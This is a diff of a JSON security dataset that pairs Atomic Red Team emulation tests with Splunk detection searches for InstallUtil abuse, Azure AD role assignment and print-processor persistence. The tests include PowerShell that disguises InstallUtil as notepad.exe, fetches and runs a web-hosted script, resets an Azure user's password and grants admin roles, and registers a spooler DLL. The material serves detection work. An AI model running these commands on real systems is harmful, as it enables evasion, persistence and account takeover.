Invoke-BuildAndInvokeInstallUtilAssembly @TestArgs\n\nif ($ActualOutput -ne $ExpectedOutput) {\n throw @\"\nInstallUtil HelpText property execution test failure. Installer assembly execution output did not match the expected output.\nExpected: $ExpectedOutput\nActual: $ActualOutput\n\"@\n}\n", "cleanup_command": "$InstallerAssemblyDir = \"#{assembly_dir}\"\n$InstallerAssemblyFileName = \"#{assembly_filename}\"\n$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName\nRemove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore\n", "name": "powershell" } @@ -190150,11 +192037,11 @@ { "description": "InstallUtil test harness script must be installed at specified location (#{test_harness})\n", "prereq_command": "if (Test-Path \"#{test_harness}\") {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile \"#{test_harness}\"\n" + "get_prereq_command": "New-Item -Type Directory (split-path \"#{test_harness}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile \"#{test_harness}\"\n" } ], "executor": { - "command": "# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly\n. #{test_harness}\n\n$InstallerAssemblyDir = \"$Env:windir\\System32\\Tasks\"\n$InstallerAssemblyFileName = 'readme.txt'\n$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName\n\n$CommandLine = \"readme.txt\"\n$ExpectedOutput = 'Constructor_'\n\n# Explicitly set the directory so that a relative path to readme.txt can be supplied.\nSet-Location \"$Env:windir\\System32\\Tasks\"\n\nCopy-Item -Path \"$([System.Runtime.InteropServices.RuntimeEnvironment]::GetRuntimeDirectory())InstallUtil.exe\" -Destination \"$Env:windir\\System32\\Tasks\\notepad.exe\"\n\n$TestArgs = @{\n OutputAssemblyDirectory = $InstallerAssemblyDir\n OutputAssemblyFileName = $InstallerAssemblyFileName\n InvocationMethod = 'Executable'\n CommandLine = $CommandLine\n InstallUtilPath = \"$Env:windir\\System32\\Tasks\\notepad.exe\"\n}\n\n$ActualOutput = Invoke-BuildAndInvokeInstallUtilAssembly @TestArgs -MinimumViableAssembly\n\nif ($ActualOutput -ne $ExpectedOutput) {\n throw @\"\nEvasive Installutil invocation test failure. Installer assembly execution output did not match the expected output.\nExpected: $ExpectedOutput\nActual: $ActualOutput\n\"@\n}\n", + "command": "# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly\n. \"#{test_harness}\"\n\n$InstallerAssemblyDir = \"$Env:windir\\System32\\Tasks\"\n$InstallerAssemblyFileName = 'readme.txt'\n$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName\n\n$CommandLine = \"readme.txt\"\n$ExpectedOutput = 'Constructor_'\n\n# Explicitly set the directory so that a relative path to readme.txt can be supplied.\nSet-Location \"$Env:windir\\System32\\Tasks\"\n\nCopy-Item -Path \"$([System.Runtime.InteropServices.RuntimeEnvironment]::GetRuntimeDirectory())InstallUtil.exe\" -Destination \"$Env:windir\\System32\\Tasks\\notepad.exe\"\n\n$TestArgs = @{\n OutputAssemblyDirectory = $InstallerAssemblyDir\n OutputAssemblyFileName = $InstallerAssemblyFileName\n InvocationMethod = 'Executable'\n CommandLine = $CommandLine\n InstallUtilPath = \"$Env:windir\\System32\\Tasks\\notepad.exe\"\n}\n\n$ActualOutput = Invoke-BuildAndInvokeInstallUtilAssembly @TestArgs -MinimumViableAssembly\n\nif ($ActualOutput -ne $ExpectedOutput) {\n throw @\"\nEvasive Installutil invocation test failure. Installer assembly execution output did not match the expected output.\nExpected: $ExpectedOutput\nActual: $ActualOutput\n\"@\n}\n", "cleanup_command": "Remove-Item -Path \"$Env:windir\\System32\\Tasks\\readme.txt\" -ErrorAction Ignore\nRemove-Item -Path \"$Env:windir\\System32\\Tasks\\readme.InstallLog\" -ErrorAction Ignore\nRemove-Item -Path \"$Env:windir\\System32\\Tasks\\readme.InstallState\" -ErrorAction Ignore\nRemove-Item -Path \"$Env:windir\\System32\\Tasks\\notepad.exe\" -ErrorAction Ignore\n", "name": "powershell" } @@ -190347,7 +192234,7 @@ { "name": "Windows DotNet Binary in Non Standard Path", "description": "The following analytic identifies native .net binaries within the Windows operating system that may be abused by adversaries by moving it to a new directory. The analytic identifies the .net binary by using a lookup and compares the process name and original file name (internal name). The analytic utilizes a lookup with the is_net_windows_file macro to identify the binary process name and original file name. if one or the other matches an alert will be generated. Adversaries abuse these binaries as they are native to windows and native DotNet. Note that not all SDK (post install of Windows) are captured in the lookup.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Processes where NOT (Processes.process_path IN (\"*\\\\Windows\\\\ADWS\\\\*\",\"*\\\\Windows\\\\SysWOW64*\", \"*\\\\Windows\\\\system32*\", \"*\\\\Windows\\\\NetworkController\\\\*\", \"*\\\\Windows\\\\SystemApps\\\\*\", \"*\\\\WinSxS\\\\*\", \"*\\\\Windows\\\\Microsoft.NET\\\\*\")) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.original_file_name Processes.process_path Processes.process_id Processes.parent_process_id | `drop_dm_object_name(\"Processes\")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `is_net_windows_file` | `windows_dotnet_binary_in_non_standard_path_filter`", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Processes where NOT (Processes.process_path IN (\"*\\\\Windows\\\\ADWS\\\\*\",\"*\\\\Windows\\\\SysWOW64*\", \"*\\\\Windows\\\\system32*\", \"*\\\\Windows\\\\NetworkController\\\\*\", \"*\\\\Windows\\\\SystemApps\\\\*\", \"*\\\\WinSxS\\\\*\", \"*\\\\Windows\\\\Microsoft.NET\\\\*\")) by Processes.dest Processes.user Processes.parent_process_name Processes.parent_process Processes.process_name Processes.process Processes.original_file_name Processes.process_path Processes.process_id Processes.parent_process_id | `drop_dm_object_name(\"Processes\")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `is_net_windows_file` | `windows_dotnet_binary_in_non_standard_path_filter`", "tags": { "name": "Windows DotNet Binary in Non Standard Path", "analytic_story": [ @@ -190472,7 +192359,7 @@ { "name": "Windows InstallUtil Credential Theft", "description": "The following analytic identifies the Windows InstallUtil.exe binary loading `vaultcli.dll` and Samlib.dll`. This technique may be used to execute code to bypassing application control and capture credentials by utilizing a tool like MimiKatz. \\\nWhen `InstallUtil.exe` is used in a malicous manner, the path to an executable on the filesystem is typically specified. Take note of the parent process. In a suspicious instance, this will be spawned from a non-standard process like `Cmd.exe`, `PowerShell.exe` or `Explorer.exe`. \\\nIf used by a developer, typically this will be found with multiple command-line switches/arguments and spawn from Visual Studio. \\\nDuring triage review resulting network connections, file modifications, and parallel processes. Capture any artifacts and review further.", - "search": "`sysmon` EventCode=7 parent_process_name=installutil.exe ImageLoaded IN (\"*\\\\samlib.dll\", \"*\\\\vaultcli.dll\") | stats count min(_time) as firstTime max(_time) as lastTime by Computer, parent_process_name, ImageLoaded, OriginalFileName, ProcessId | rename Computer as dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_installutil_credential_theft_filter`", + "search": "`sysmon` EventCode=7 parent_process_name=installutil.exe ImageLoaded IN (\"*\\\\samlib.dll\", \"*\\\\vaultcli.dll\") | stats count min(_time) as firstTime max(_time) as lastTime by dest, parent_process_name, ImageLoaded, OriginalFileName, ProcessId | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_installutil_credential_theft_filter`", "tags": { "name": "Windows InstallUtil Credential Theft", "analytic_story": [ @@ -190485,7 +192372,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ loading samlib.dll and vaultcli.dll to potentially capture credentials in memory.", + "message": "An instance of $parent_process_name$ spawning $ImageLoaded$ was identified on endpoint $dest$ loading samlib.dll and vaultcli.dll to potentially capture credentials in memory.", "mitre_attack_id": [ "T1218.004", "T1218" @@ -190494,13 +192381,6 @@ "DE.CM" ], "observable": [ - { - "name": "user", - "type": "User", - "role": [ - "Victim" - ] - }, { "name": "dest", "type": "Hostname", @@ -190514,13 +192394,6 @@ "role": [ "Parent Process" ] - }, - { - "name": "process_name", - "type": "Process", - "role": [ - "Child Process" - ] } ], "risk_score": 80, @@ -190554,7 +192427,7 @@ { "name": "Windows InstallUtil in Non Standard Path", "description": "The following analytic identifies the Windows binary InstallUtil.exe running from a non-standard location. The analytic utilizes a macro for InstallUtil and identifies both the process_name and original_file_name.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Processes where `process_installutil` NOT (Processes.process_path IN (\"*\\\\Windows\\\\ADWS\\\\*\",\"*\\\\Windows\\\\SysWOW64*\", \"*\\\\Windows\\\\system32*\", \"*\\\\Windows\\\\NetworkController\\\\*\", \"*\\\\Windows\\\\SystemApps\\\\*\", \"*\\\\WinSxS\\\\*\", \"*\\\\Windows\\\\Microsoft.NET\\\\*\")) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.original_file_name Processes.process_id Processes.parent_process_id Processes.process_hash | `drop_dm_object_name(\"Processes\")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_installutil_in_non_standard_path_filter`", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Processes where `process_installutil` NOT (Processes.process_path IN (\"*\\\\Windows\\\\ADWS\\\\*\",\"*\\\\Windows\\\\SysWOW64*\", \"*\\\\Windows\\\\system32*\", \"*\\\\Windows\\\\NetworkController\\\\*\", \"*\\\\Windows\\\\SystemApps\\\\*\", \"*\\\\WinSxS\\\\*\", \"*\\\\Windows\\\\Microsoft.NET\\\\*\")) by Processes.dest Processes.user Processes.parent_process_name Processes.parent_process Processes.process_name Processes.process Processes.original_file_name Processes.process_id Processes.parent_process_id Processes.process_hash | `drop_dm_object_name(\"Processes\")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_installutil_in_non_standard_path_filter`", "tags": { "name": "Windows InstallUtil in Non Standard Path", "analytic_story": [ @@ -190680,7 +192553,7 @@ { "name": "Windows InstallUtil Remote Network Connection", "description": "The following analytic identifies the Windows InstallUtil.exe binary making a remote network connection. This technique may be used to download and execute code while bypassing application control. \\\nWhen `InstallUtil.exe` is used in a malicous manner, the path to an executable on the filesystem is typically specified. Take note of the parent process. In a suspicious instance, this will be spawned from a non-standard process like `Cmd.exe`, `PowerShell.exe` or `Explorer.exe`. \\\nIf used by a developer, typically this will be found with multiple command-line switches/arguments and spawn from Visual Studio. \\\nDuring triage review resulting network connections, file modifications, and parallel processes. Capture any artifacts and review further.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where `process_installutil` by _time span=1h Processes.process_id Processes.process_name Processes.dest Processes.process_path Processes.process Processes.parent_process_name Processes.original_file_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | join process_id [| tstats `security_content_summariesonly` count FROM datamodel=Network_Traffic.All_Traffic where All_Traffic.dest_port != 0 by All_Traffic.process_id All_Traffic.dest All_Traffic.dest_port | `drop_dm_object_name(All_Traffic)` | rename dest as C2 ] | table _time dest parent_process_name process_name process_path process process_id dest_port C2 | `windows_installutil_remote_network_connection_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where `process_installutil` by _time span=1h Processes.process_id Processes.process_name Processes.dest Processes.process_path Processes.process Processes.parent_process_name Processes.original_file_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | join process_id [| tstats `security_content_summariesonly` count FROM datamodel=Network_Traffic.All_Traffic where All_Traffic.dest_port != 0 by All_Traffic.process_id All_Traffic.dest All_Traffic.dest_port | `drop_dm_object_name(All_Traffic)` | rename dest as C2 ] | table _time user dest parent_process_name process_name process_path process process_id dest_port C2 | `windows_installutil_remote_network_connection_filter`", "tags": { "name": "Windows InstallUtil Remote Network Connection", "analytic_story": [ @@ -190846,7 +192719,7 @@ { "name": "Windows InstallUtil Uninstall Option with Network", "description": "The following analytic identifies the Windows InstallUtil.exe binary making a remote network connection. This technique may be used to download and execute code while bypassing application control using the `/u` (uninstall) switch. \\\nInstallUtil uses the functions install and uninstall within the System.Configuration.Install namespace to process .net assembly. Install function requires admin privileges, however, uninstall function can be run as an unprivileged user.\\\nWhen `InstallUtil.exe` is used in a malicous manner, the path to an executable on the filesystem is typically specified. Take note of the parent process. In a suspicious instance, this will be spawned from a non-standard process like `Cmd.exe`, `PowerShell.exe` or `Explorer.exe`. \\\nIf used by a developer, typically this will be found with multiple command-line switches/arguments and spawn from Visual Studio. \\\nDuring triage review resulting network connections, file modifications, and parallel processes. Capture any artifacts and review further.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where `process_installutil` Processes.process IN (\"*/u*\", \"*uninstall*\") by _time span=1h Processes.process_id Processes.process_name Processes.dest Processes.process_path Processes.process Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | join process_id [| tstats `security_content_summariesonly` count FROM datamodel=Network_Traffic.All_Traffic where All_Traffic.dest_port != 0 by All_Traffic.process_id All_Traffic.dest All_Traffic.dest_port | `drop_dm_object_name(All_Traffic)` | rename dest as C2 ] | table _time dest parent_process_name process_name process_path process process_id dest_port C2 | `windows_installutil_uninstall_option_with_network_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where `process_installutil` Processes.process IN (\"*/u*\", \"*uninstall*\") by _time span=1h Processes.user Processes.process_id Processes.process_name Processes.dest Processes.process_path Processes.process Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | join process_id [| tstats `security_content_summariesonly` count FROM datamodel=Network_Traffic.All_Traffic where All_Traffic.dest_port != 0 by All_Traffic.process_id All_Traffic.dest All_Traffic.dest_port | `drop_dm_object_name(All_Traffic)` | rename dest as C2 ] | table _time user dest parent_process_name process_name process_path process process_id dest_port C2 | `windows_installutil_uninstall_option_with_network_filter`", "tags": { "name": "Windows InstallUtil Uninstall Option with Network", "analytic_story": [ @@ -193705,10 +195578,107 @@ "phase_name": "persistence" } ], - "command_list": [], + "command_list": [ + "Import-Module MSOnline\n$Password = ConvertTo-SecureString -String \"p4sswd\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"jonh@contoso.com\", $Password\nConnect-MsolService -Credential $Credential\nAdd-MsolRoleMember -RoleName \"Company Administrator\" -RoleMemberEmailAddress \"default\"\n", + "Import-Module MSOnline\nImport-Module AzureAD\n$password = ConvertTo-SecureString -String \"p4sswd\" -AsPlainText -Force\n$credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"jonh@contoso.com\", $password\n$targetsecurepw = ConvertTo-SecureString -String \"Ohn05GeMe#$\" -AsPlainText -Force\nConnect-MsolService -Credential $credential -ErrorAction:SilentlyContinue\nConnect-AzureAD -Credential $credential -ErrorAction:SilentlyContinue\n\n#Saving the ObjectId of the target_user into a variable\n$target_objid = Get-AzureADUser -filter \"userPrincipalName eq 'default'\" | Select-Object -ExpandProperty ObjectId\n\n#Reset the password of the target_user\nSet-AzureADUserPassword -ObjectId $target_objid -Password $targetsecurepw -ErrorAction:SilentlyContinue\n\n#Adding target_user\nAdd-MsolRoleMember -RoleName \"Company Administrator\" -RoleMemberEmailAddress \"default\"\nAdd-MsolRoleMember -RoleName \"Global Reader\" -RoleMemberEmailAddress \"default\"\n" + ], "commands": [], "queries": [], - "parsed_datasets": [], + "parsed_datasets": [ + { + "source": "atomics/T1098.003/T1098.003.yaml", + "name": "Atomic Red Team Test - Account Manipulation: Additional Cloud Roles", + "content": { + "attack_technique": "T1098.003", + "display_name": "Account Manipulation: Additional Cloud Roles", + "atomic_tests": [ + { + "name": "Azure AD - Add Company Administrator Role to a user", + "auto_generated_guid": "4d77f913-56f5-4a14-b4b1-bf7bb24298ad", + "description": "Add an existing Azure user account the Company Administrator Role.\n", + "supported_platforms": [ + "azure-ad" + ], + "input_arguments": { + "username": { + "description": "Azure AD username", + "type": "string", + "default": "jonh@contoso.com" + }, + "password": { + "description": "Azure AD password", + "type": "string", + "default": "p4sswd" + }, + "target_user": { + "description": "Name of the user who will be assigned the Company Admin role", + "type": "string", + "default": "default" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "MSOnline module must be installed.\n", + "prereq_command": "try {if (Get-InstalledModule -Name MSOnline -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}\n", + "get_prereq_command": "Install-Module -Name MSOnline -Force\n" + } + ], + "executor": { + "command": "Import-Module MSOnline\n$Password = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Password\nConnect-MsolService -Credential $Credential\nAdd-MsolRoleMember -RoleName \"Company Administrator\" -RoleMemberEmailAddress \"#{target_user}\"\n", + "cleanup_command": "Remove-MsolRoleMember -RoleName \"Company Administrator\" -RoleMemberType User -RoleMemberEmailAddress \"#{target_user}\"\n", + "name": "powershell", + "elevation_required": false + } + }, + { + "name": "Simulate - Post BEC persistence via user password reset followed by user added to company administrator role", + "auto_generated_guid": "14f3af20-61f1-45b8-ad31-4637815f3f44", + "description": "This test looks at simulating the an adversary described in the following blog post. It involves resetting the password of a normal user and adding to the company administrator role within M365.\n Reference: https://www.huntress.com/blog/business-email-compromise-via-azure-administrative-privileges\n", + "supported_platforms": [ + "azure-ad" + ], + "input_arguments": { + "auth_username": { + "description": "Azure AD username used to conduct the adversary activity", + "type": "string", + "default": "jonh@contoso.com" + }, + "auth_password": { + "description": "Azure AD password for user auth_username", + "type": "string", + "default": "p4sswd" + }, + "target_user": { + "description": "Name of the user whose password be reset and added to the admin role.", + "type": "string", + "default": "default" + }, + "target_password": { + "description": "The password that the user target_user will be reset to.", + "type": "string", + "default": "Ohn05GeMe#$" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "MSOnline and AzureAD modules must be installed.\n", + "prereq_command": "$required_mods = 'AzureAD', 'MSOnline'\n$installed_mods = @((Get-Module $required_mods -ListAvailable -ErrorAction SilentlyContinue).Name | Select-Object -Unique)\n$notInstalled = Compare-Object $required_mods $installed_mods -PassThru -ErrorAction SilentlyContinue\n\nif ($notInstalled) {\n# Prompt for installing the missing ones.\nWrite-Output \"The following PS modules aren't currently installed:\"\n$notInstalled\n exit 1\n}\n\n else{\n Write-Output \"All required PS modules are installed\"\n exit 0\n }\n", + "get_prereq_command": "Install-Module -Name MSOnline -Scope CurrentUser -Force\nInstall-Module -Name AzureAD -Scope CurrentUser -Force\n" + } + ], + "executor": { + "command": "Import-Module MSOnline\nImport-Module AzureAD\n$password = ConvertTo-SecureString -String \"#{auth_password}\" -AsPlainText -Force\n$credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{auth_username}\", $password\n$targetsecurepw = ConvertTo-SecureString -String \"#{target_password}\" -AsPlainText -Force\nConnect-MsolService -Credential $credential -ErrorAction:SilentlyContinue\nConnect-AzureAD -Credential $credential -ErrorAction:SilentlyContinue\n\n#Saving the ObjectId of the target_user into a variable\n$target_objid = Get-AzureADUser -filter \"userPrincipalName eq '#{target_user}'\" | Select-Object -ExpandProperty ObjectId\n\n#Reset the password of the target_user\nSet-AzureADUserPassword -ObjectId $target_objid -Password $targetsecurepw -ErrorAction:SilentlyContinue\n\n#Adding target_user\nAdd-MsolRoleMember -RoleName \"Company Administrator\" -RoleMemberEmailAddress \"#{target_user}\"\nAdd-MsolRoleMember -RoleName \"Global Reader\" -RoleMemberEmailAddress \"#{target_user}\"\n", + "cleanup_command": "Import-Module MSOnline\n$password = ConvertTo-SecureString -String \"#{auth_password}\" -AsPlainText -Force\n$credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{auth_username}\", $password\nConnect-MsolService -Credential $credential\nRemove-MsolRoleMember -RoleName \"Company Administrator\" -RoleMemberType User -RoleMemberEmailAddress \"#{target_user}\"\nRemove-MsolRoleMember -RoleName \"Global Reader\" -RoleMemberType User -RoleMemberEmailAddress \"#{target_user}\"\n", + "name": "powershell", + "elevation_required": false + } + } + ] + } + } + ], "possible_detections": [ { "technique_id": "T1098.003", @@ -194091,7 +196061,7 @@ { "name": "Azure AD Application Administrator Role Assigned", "description": "The following analytic identifies the assignment of the Application Administrator role to an Azure AD user. Users in this role can create and manage all aspects of enterprise applications, application registrations, and application proxy settings. This role also grants the ability to manage application credentials. Users assigned this role can add credentials to an application, and use those credentials to impersonate the applications identity. If the applications identity has been granted access to a resource, such as the ability to create or update User or other objects, then a user assigned to this role could perform those actions while impersonating the application. This ability to impersonate the applications identity may be an elevation of privilege over what the user can do via their role assignments. Red teams and adversaries alike may abuse this role to escalate their privileges in an Azure AD tenant.", - "search": " `azuread` \"body.operationName\"=\"Add member to role\" \"body.properties.targetResources{}.modifiedProperties{}.newValue\"=\"\\\"Application Administrator\\\"\" | rename body.properties.* as * | rename targetResources{}.userPrincipalName as userPrincipalName | rename initiatedBy.user.userPrincipalName as initiatedBy | stats values(userPrincipalName) by _time, initiatedBy, result, body.operationName | `azure_ad_application_administrator_role_assigned_filter`", + "search": " `azuread` \"operationName\"=\"Add member to role\" \"properties.targetResources{}.modifiedProperties{}.newValue\"=\"\\\"Application Administrator\\\"\" | rename properties.* as * | rename targetResources{}.userPrincipalName as userPrincipalName | rename initiatedBy.user.userPrincipalName as initiatedBy | stats values(userPrincipalName) as userPrincipalName by _time, initiatedBy, result, operationName | `azure_ad_application_administrator_role_assigned_filter`", "tags": { "name": "Azure AD Application Administrator Role Assigned", "analytic_story": [ @@ -194165,7 +196135,7 @@ { "name": "Azure AD Global Administrator Role Assigned", "description": "The following analytic identifies the assignment of the Azure AD Global Administrator role to an Azure AD user. The Global Administrator role is the most powerful administrator role in Azure AD and provides almost unlimited access to data, resources and settings. It is equivalent to the Domain Administrator group in an Active Directory environment. While Azure AD roles do not grant access to Azure services and resources, it is possible for a Global Administrator account to gain control of Azure resources. Adversaries and red teams alike may assign this role to a compromised account to establish Persistence or escalate their privileges in an Azure AD environment.", - "search": "`azuread` \"body.operationName\"=\"Add member to role\" \"body.properties.targetResources{}.modifiedProperties{}.newValue\"=\"\\\"Global Administrator\\\"\" | rename body.properties.* as * | rename targetResources{}.userPrincipalName as userPrincipalName | rename initiatedBy.user.userPrincipalName as initiatedBy | stats values(userPrincipalName) by _time, initiatedBy, result, body.operationName | `azure_ad_global_administrator_role_assigned_filter`", + "search": "`azuread` operationName=\"Add member to role\" properties.targetResources{}.modifiedProperties{}.newValue=\"\\\"Global Administrator\\\"\" | rename properties.* as * | rename targetResources{}.userPrincipalName as userPrincipalName | rename initiatedBy.user.userPrincipalName as initiatedBy | stats values(userPrincipalName) as userPrincipalName by _time, initiatedBy, result, operationName | `azure_ad_global_administrator_role_assigned_filter`", "tags": { "name": "Azure AD Global Administrator Role Assigned", "analytic_story": [ @@ -194356,7 +196326,7 @@ { "name": "Azure AD Privileged Role Assigned", "description": "The following analytic identifies the assignment of sensitive and privileged Azure Active Directory roles to an Azure AD user. Adversaries and red teams alike may assign these roles to a compromised account to establish Persistence in an Azure AD environment.", - "search": " `azuread` \"body.operationName\"=\"Add member to role\" | rename body.properties.* as * | rename targetResources{}.userPrincipalName as userPrincipalName | rename initiatedBy.user.userPrincipalName as initiatedBy | rename targetResources{}.modifiedProperties{}.newValue as roles | eval role=mvindex(roles,1) | lookup privileged_azure_ad_roles azureadrole AS role OUTPUT isprvilegedadrole description | search isprvilegedadrole = True | stats values(userPrincipalName) by _time, initiatedBy, result, body.operationName, role, description | `azure_ad_privileged_role_assigned_filter`", + "search": " `azuread` \"operationName\"=\"Add member to role\" | rename properties.* as * | rename targetResources{}.userPrincipalName as userPrincipalName | rename initiatedBy.user.userPrincipalName as initiatedBy | rename targetResources{}.modifiedProperties{}.newValue as roles | eval role=mvindex(roles,1) | lookup privileged_azure_ad_roles azureadrole AS role OUTPUT isprvilegedadrole description | search isprvilegedadrole = True | stats values(userPrincipalName) as userPrincipalName by _time, initiatedBy, result, operationName, role, description | `azure_ad_privileged_role_assigned_filter`", "tags": { "name": "Azure AD Privileged Role Assigned", "analytic_story": [ @@ -194607,7 +196577,7 @@ } ], "command_list": [ - "if( $(get-service -Name spooler).StartType -eq \"Disabled\") {Set-Service -Name \"spooler\" -StartupType Automatic}\nnet stop spooler\nCopy-Item \\T1547.012\\bin\\AtomicTest.dll C:\\Windows\\System32\\spool\\prtprocs\\x64\\AtomicTest.dll\nreg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Environments\\Windows x64\\Print Processors\\AtomicRedTeam\" /v \"Driver\" /d \"AtomicTest.dll\" /t REG_SZ /f\nnet start spooler\nif(#{restart}){\n Restart-Computer\n}\n" + "if( $(get-service -Name spooler).StartType -eq \"Disabled\") {Set-Service -Name \"spooler\" -StartupType Automatic}\nnet stop spooler\nCopy-Item \"\\T1547.012\\bin\\AtomicTest.dll\" C:\\Windows\\System32\\spool\\prtprocs\\x64\\AtomicTest.dll\nreg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Environments\\Windows x64\\Print Processors\\AtomicRedTeam\" /v \"Driver\" /d \"AtomicTest.dll\" /t REG_SZ /f\nnet start spooler\nif(#{restart}){\n Restart-Computer\n}\n" ], "commands": [], "queries": [], @@ -194634,7 +196604,7 @@ } }, "executor": { - "command": "if( $(get-service -Name spooler).StartType -eq \"Disabled\") {Set-Service -Name \"spooler\" -StartupType Automatic}\nnet stop spooler\nCopy-Item $PathToAtomicsFolder\\T1547.012\\bin\\AtomicTest.dll C:\\Windows\\System32\\spool\\prtprocs\\x64\\AtomicTest.dll\nreg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Environments\\Windows x64\\Print Processors\\AtomicRedTeam\" /v \"Driver\" /d \"AtomicTest.dll\" /t REG_SZ /f\nnet start spooler\nif(#{restart}){\n Restart-Computer\n}\n", + "command": "if( $(get-service -Name spooler).StartType -eq \"Disabled\") {Set-Service -Name \"spooler\" -StartupType Automatic}\nnet stop spooler\nCopy-Item \"$PathToAtomicsFolder\\T1547.012\\bin\\AtomicTest.dll\" C:\\Windows\\System32\\spool\\prtprocs\\x64\\AtomicTest.dll\nreg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Environments\\Windows x64\\Print Processors\\AtomicRedTeam\" /v \"Driver\" /d \"AtomicTest.dll\" /t REG_SZ /f\nnet start spooler\nif(#{restart}){\n Restart-Computer\n}\n", "cleanup_command": "net stop spooler\nrm -force C:\\Windows\\System32\\spool\\prtprocs\\x64\\AtomicTest.dll -ErrorAction SilentlyContinue\nrm -force C:\\Users\\Public\\AtomicTest.txt -ErrorAction SilentlyContinue\nremove-item \"HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Print\\Environments\\Windows x64\\Print Processors\\AtomicRedTeam\" -Force -ErrorAction SilentlyContinue\nnet start spooler\n", "name": "powershell", "elevation_required": true @@ -195227,7 +197197,7 @@ { "name": "Spoolsv Suspicious Loaded Modules", "description": "This search is to detect suspicious loading of dll in specific path relative to printnightmare exploitation. In this search we try to detect the loaded modules made by spoolsv.exe after the exploitation.", - "search": "`sysmon` EventCode=7 Image =\"*\\\\spoolsv.exe\" ImageLoaded=\"*\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\*\" ImageLoaded = \"*.dll\" | stats dc(ImageLoaded) as countImgloaded values(ImageLoaded) as ImgLoaded count min(_time) as firstTime max(_time) as lastTime by Image Computer ProcessId EventCode | where countImgloaded >= 3 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `spoolsv_suspicious_loaded_modules_filter`", + "search": "`sysmon` EventCode=7 Image =\"*\\\\spoolsv.exe\" ImageLoaded=\"*\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\*\" ImageLoaded = \"*.dll\" | stats dc(ImageLoaded) as countImgloaded values(ImageLoaded) as ImgLoaded count min(_time) as firstTime max(_time) as lastTime by Image Computer ProcessId EventCode | rename Computer as dest | where countImgloaded >= 3 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `spoolsv_suspicious_loaded_modules_filter`", "tags": { "name": "Spoolsv Suspicious Loaded Modules", "analytic_story": [ @@ -195241,7 +197211,7 @@ "Installation", "Exploitation" ], - "message": "$Image$ with process id $process_id$ has loaded a driver from $ImageLoaded$ on endpoint $Computer$. This behavior is suspicious and related to PrintNightmare.", + "message": "$Image$ with process id $ProcessId$ has loaded a driver from $ImageLoaded$ on endpoint $dest$. This behavior is suspicious and related to PrintNightmare.", "mitre_attack_id": [ "T1547.012", "T1547" @@ -195251,26 +197221,11 @@ ], "observable": [ { - "name": "Computer", + "name": "dest", "type": "Endpoint", "role": [ "Victim" ] - }, - { - "name": "process_id", - "type": "Process Name", - "role": [ - "Parent Process", - "Attacker" - ] - }, - { - "name": "ImageLoaded", - "type": "File", - "role": [ - "Other" - ] } ], "risk_score": 72, @@ -197791,7 +199746,8 @@ 